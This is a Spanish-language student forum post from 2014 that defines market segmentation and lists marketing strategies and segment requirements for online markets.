Mencione al menos dos bases de segmentación más comunes para mercados en línea

Mensaje  l. alan pineda valdez el Miér Ago 27, 2014 10:39 pm

ola chicos según lo que dicen etas personas y que puede ayudarnos a darnos una idea mas clara el porque es necesario estar al día. Patrico Bonta y Mario Farber, definen a la segmentación del mercado como el proceso por medio del cual se divide el mercado en porciones menores de acuerdo con una determinada características, que le sea de utilidad a la empresa para cumplir con sus planes. Al segmentar el mercado se pueden maximizar los esfuerzos de marketing en el segmento elegido y se facilita su conocimiento.
Básicamente consiste en agrupar a clientes con un perfil homogéneo que demandan características idénticas de un producto o servicio y es importante para comprender el comportamiento de los clientes y mejorar la comunicación con ellos, y para identificar necesidades y definir requerimientos de nuevos servicios, todo ello para favorecer la captación y retención del cliente.
Esta técnica de marketing nos permite generar diferentes listas de clientes con comportamientos o características heterogéneas entre sí, para poder ofertarles un producto o servicio concreto a través de una comunicación o una acción de marketing orientada a sus intereses
Las acciones de marketing permiten tres estrategias básicas:
 Marketing Indiferenciado: Un único mensaje y una única presentación de producto. No exige segmentación.
 Marketing Diferenciado: Exige un mensaje (plan) y producto adaptado a cada segmento de mercado, pero con un producto orientado a todo el mercado.
 Marketing Concentrado o Enfocado: Producto y mensaje únicamente orientado a uno o varios segmentos de mercado, sin buscar la comercialización global.
Solo en los dos últimos de aplica la segmentación de mercado.
A continuación mostramos algunas de las características de la segmentación
La segmentación exige que los grupos de clientes objetivos cumplan una serie de requisitos:
 Cuantificación: Posibilidad de contar los miembros integrantes del segmento generado.
 Accesibilidad: Posibilidad de acceder a los miembros del grupo (empleando para ello cualquier formato).
 Homogeneidad: Posibilidad de diseñar planes de comunicación adecuados a todo el segmento.
 Sustanciabilidad: Grupo en nº suficiente para que sea rentable por su tamaño o por su interés comercial (margen de ventas generado, influencia)
creemos que la segmentación de mercado pues esto nos permite llegar al consumidor final directamente y podemos estar enterados de sus gustos y preferencias dependiendo de el área o lugar donde se encuentren y así permitir a las empresas que tengan mejor competitividad.
equipo GUILLERMINA AGUSTIN MARQUEZ Y LUIS ALAN PINEDA VALDEZ

l. alan pineda valdez
Invitado


Volver arriba Ir abajo

Re: 1.- Mercadotecnia y evolución de los negocios electrónicos

Mensaje  Contenido patrocinado


Contenido patrocinado


Volver arriba Ir abajo

Página 1 de 3. 1, 2, 3  Siguiente

Ver el tema anterior Ver el tema siguiente Volver arriba

- Temas similares

 
Permisos de este foro:
Puedes responder a temas en este foro.